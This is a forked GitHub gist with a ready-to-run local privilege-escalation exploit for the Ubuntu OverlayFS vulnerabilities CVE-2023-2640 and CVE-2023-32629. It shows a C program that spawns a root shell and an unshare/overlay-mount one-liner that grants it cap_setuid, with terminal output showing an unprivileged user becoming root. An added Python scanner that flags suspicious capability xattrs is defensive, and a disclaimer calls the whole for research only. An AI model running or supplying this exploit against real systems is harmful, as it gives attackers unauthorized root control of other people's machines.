@petarbojic
Forked from win3zz/GameOver(lay).md
Created November 11, 2023 10:07
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
```
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {
        fprintf(stderr, "\x1b[31mFailed to set UID to 0.\x1b[0m\n");
        return 1;
    }

    printf("Entering \x1b[36mprivileged\x1b[0m shell...\n");
    if (system("/bin/bash -p") == -1) {
        fprintf(stderr, "\x1b[31mFailed to execute /bin/bash -p.\x1b[0m\n");
        return 1;
    }

    return 0;
}
user@hostname:~/exploit$ gcc test.c -o test
user@hostname:~/exploit$ ls -l
total 20
-rwxr-xr-x 1 kali kali 16320 Nov 10 08:43 test
-rw-r--r-- 1 kali kali   412 Nov 10 08:42 test.c
user@hostname:~/exploit$ ./test
Failed to set UID to 0.
user@hostname:~/exploit$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer)
user@hostname:~/exploit$ unshare -rm sh -c "
    mkdir l u w m &&
    cp test l/ &&
    setcap cap_setuid+eip l/test &&
    mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &&
    touch m/test &&
    u/test;"
Entering privileged shell...
root@hostname:~/exploit# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@hostname:~/exploit#
```


Refer to the original research article for more details: https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability (archive)
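
An audit for the kind of on-disk artefact the session above relies on, as an added example that is not part of the original gist: it decodes the `security.capability` xattr that `setcap` writes and flags files not owned by root that carry `cap_setuid` without being bound to a non-root user namespace. The ownership heuristic, the function names and the sample byte strings are assumptions made for this example.

```python
import os
import struct
import sys

CAP_SETUID = 7                       # bit number from linux/capability.h
VFS_CAP_FLAGS_EFFECTIVE = 0x000001
# revision magic -> (revision, number of 32-bit permitted/inheritable pairs)
REVISIONS = {0x01000000: (1, 1), 0x02000000: (2, 2), 0x03000000: (3, 2)}

def decode_vfs_cap(raw):
    """Decode a security.capability value (little-endian struct vfs_cap_data)."""
    if len(raw) < 4:
        raise ValueError("truncated capability xattr")
    (magic,) = struct.unpack_from("<I", raw)
    rev, pairs = REVISIONS.get(magic & 0xFF000000, (None, 0))
    if rev is None or len(raw) != 4 + 8 * pairs + (4 if rev == 3 else 0):
        raise ValueError("unknown revision or wrong length")
    permitted = inheritable = 0
    for i in range(pairs):
        p, inh = struct.unpack_from("<II", raw, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    # Revision 3 appends the uid of the user-namespace root the caps are bound to.
    rootid = struct.unpack_from("<I", raw, 4 + 8 * pairs)[0] if rev == 3 else None
    return {"revision": rev, "permitted": permitted, "inheritable": inheritable,
            "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE), "rootid": rootid}

def is_suspicious(cap, owner_uid):
    """Heuristic (assumption): cap_setuid not bound to a namespace, file not owned by root."""
    unbound = cap["rootid"] in (None, 0)
    return unbound and owner_uid != 0 and bool(cap["permitted"] >> CAP_SETUID & 1)

def scan(root):
    """Walk a tree and return paths whose capability xattr trips the heuristic."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
                if is_suspicious(decode_vfs_cap(raw), os.lstat(path).st_uid):
                    hits.append(path)
            except (OSError, ValueError):
                continue             # no xattr, unreadable file, or malformed value
    return hits

# Constructed sample values: cap_setuid+eip as revision 2, and as revision 3 bound to uid 1000.
SAMPLE_V2 = struct.pack("<5I", 0x02000001, 1 << CAP_SETUID, 1 << CAP_SETUID, 0, 0)
SAMPLE_V3 = struct.pack("<6I", 0x03000001, 1 << CAP_SETUID, 1 << CAP_SETUID, 0, 0, 1000)

if __name__ == "__main__":
    print("\n".join(scan(sys.argv[1] if len(sys.argv) > 1 else ".")))
```

Run it with a directory argument, for example a home directory or an overlay upper directory; the scan needs Linux because it uses `os.getxattr`.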

Disclaimer

This PoC is intended for research and educational purposes only. Any actions taken based on the information provided in this gist are solely at the user's own risk. The vulnerabilities described in this report should not be exploited in any unauthorized or malicious manner. The authors and contributors are not responsible for any misuse or damage that may result from the use of this information.
